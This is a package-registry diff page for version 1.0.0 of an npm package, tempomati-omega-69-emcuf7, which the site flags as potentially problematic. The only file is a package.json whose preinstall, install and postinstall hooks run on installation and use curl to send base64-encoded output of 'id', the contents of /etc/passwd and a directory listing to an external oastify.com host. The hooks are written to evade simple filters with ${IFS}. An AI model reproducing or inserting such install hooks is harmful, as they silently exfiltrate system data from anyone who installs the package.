tempomati-omega-69-emcuf7 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of tempomati-omega-69-emcuf7 might be problematic. Click here for more details.
- package/package.json +13 -0
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "tempomati-omega-69-emcuf7",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "curl https://m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/preinstall?q=`id|base64`",
|
8
|
+
"postinstall": "curl https://m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/postinstall?q=`cat${IFS}/etc/passwd|base64${IFS}-w0`",
|
9
|
+
"install": "curl https://m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/install?q=`ls|base64`"
|
10
|
+
},
|
11
|
+
"author": "",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|